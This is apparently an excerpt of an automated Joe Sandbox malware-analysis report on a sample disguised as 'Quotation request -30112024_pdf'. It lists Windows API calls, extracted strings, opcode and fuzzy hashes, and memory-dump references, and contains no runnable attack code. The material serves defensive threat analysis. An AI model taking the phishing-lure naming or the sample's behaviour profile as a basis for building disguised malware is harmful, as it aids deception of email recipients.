                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 3631882475-2268648507
                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                    APIs
                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                    • SendMessageW.USER32 ref: 00471740
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                    • String ID:
                                                                    • API String ID: 4116747274-0
                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                    • _wcslen.LIBCMT ref: 00461683
                                                                    • __swprintf.LIBCMT ref: 00461721
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                    • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                    • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                    • GetParent.USER32(?), ref: 004618C3
                                                                    • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                    • String ID: %s%u
                                                                    • API String ID: 1899580136-679674701
                                                                    • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                    • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                    • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                    • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: InfoItemMenu$Sleep
                                                                    • String ID: 0
                                                                    • API String ID: 1196289194-4108050209
                                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                    • String ID: (
                                                                    • API String ID: 3300687185-3887548279
                                                                    • Opcode ID: 310223a7c2c425deceda40c7a51925335e337e9494f19c196f00ba520c5da5b8
                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                    • Opcode Fuzzy Hash: 310223a7c2c425deceda40c7a51925335e337e9494f19c196f00ba520c5da5b8
                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                    APIs
                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1976180769-4113822522
                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                    • String ID:
                                                                    • API String ID: 461458858-0
                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                    Similarity
                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3969911579-0
                                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                    • String ID: 0
                                                                    • API String ID: 956284711-4108050209
                                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 1965227024-3771769585
                                                                    • Opcode ID: cdd1dfb690482b2214089a3a0103eb647f736811691166771604787f4c4d7546
                                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                    • Opcode Fuzzy Hash: cdd1dfb690482b2214089a3a0103eb647f736811691166771604787f4c4d7546
                                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: SendString$_memmove_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 369157077-1007645807
                                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00445BF8
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 3125838495-3381328864
                                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CharNext
                                                                    • String ID:
                                                                    • API String ID: 1350042424-0
                                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                    APIs
                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 3052893215-2127371420
                                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2295938435-2354261254
                                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 3038501623-2263619337
                                                                    • Opcode ID: 3169b76b2b6c9aab97f551ef2568232911a962d4183b5d8432e009bdf3988692
                                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                    • Opcode Fuzzy Hash: 3169b76b2b6c9aab97f551ef2568232911a962d4183b5d8432e009bdf3988692
                                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2295938435-8599901
                                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00443B67
                                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                    • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                    • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                    • IsWindow.USER32(00000000), ref: 00443C3A
                                                                    • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1834419854-3405671355
                                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                    APIs
